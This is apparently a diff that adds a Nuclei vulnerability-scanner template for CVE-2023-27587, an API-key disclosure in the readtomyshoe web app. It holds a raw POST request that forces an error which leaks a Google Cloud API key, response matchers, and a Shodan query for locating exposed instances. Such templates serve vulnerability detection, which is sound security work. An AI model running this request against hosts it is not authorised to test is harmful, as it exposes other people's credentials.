■ ■ ■ ■ ■ ■
nuclei-templates/cves/2023/CVE-2023-27587.yaml
| 1 | + | id: CVE-2023-27587 |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: readtomyshoe - Google Cloud API Disclosure |
| 5 | + | author: vagnerd |
| 6 | + | severity: high |
| 7 | + | description: | |
| 8 | + | If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. |
| 9 | + | reference: |
| 10 | + | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587 |
| 11 | + | - https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g |
| 12 | + | - https://github.com/sec-fx/CVE-2023-27587-PoC |
| 13 | + | classification: |
| 14 | + | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
| 15 | + | cvss-score: 7.4 |
| 16 | + | cve-id: CVE-2023-27587 |
| 17 | + | cwe-id: CWE-209 |
| 18 | + | metadata: |
| 19 | + | shodan-query: http.html:"readtomyshoe" || title:"ReadToMyShoe" |
| 20 | + | verified: "true" |
| 21 | + | tags: cve,cve2023,leak,debug,readtomyshoe |
| 22 | + | |
| 23 | + | requests: |
| 24 | + | - raw: |
| 25 | + | - | |
| 26 | + | POST /api/add-article-by-text HTTP/1.1 |
| 27 | + | Host: {{Hostname}} |
| 28 | + | Accept-Encoding: gzip, deflate |
| 29 | + | Content-Type: application/json |
| 30 | + | |
| 31 | + | { |
| 32 | + | "title":"Kernsicherheitstest", |
| 33 | + | "body":"Kernsicherheitstest" |
| 34 | + | } |
| 35 | + | |
| 36 | + | matchers-condition: and |
| 37 | + | matchers: |
| 38 | + | - type: status |
| 39 | + | status: |
| 40 | + | - 500 |
| 41 | + | |
| 42 | + | - type: dsl |
| 43 | + | dsl: |
| 44 | + | - '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')' |
| 45 | + | |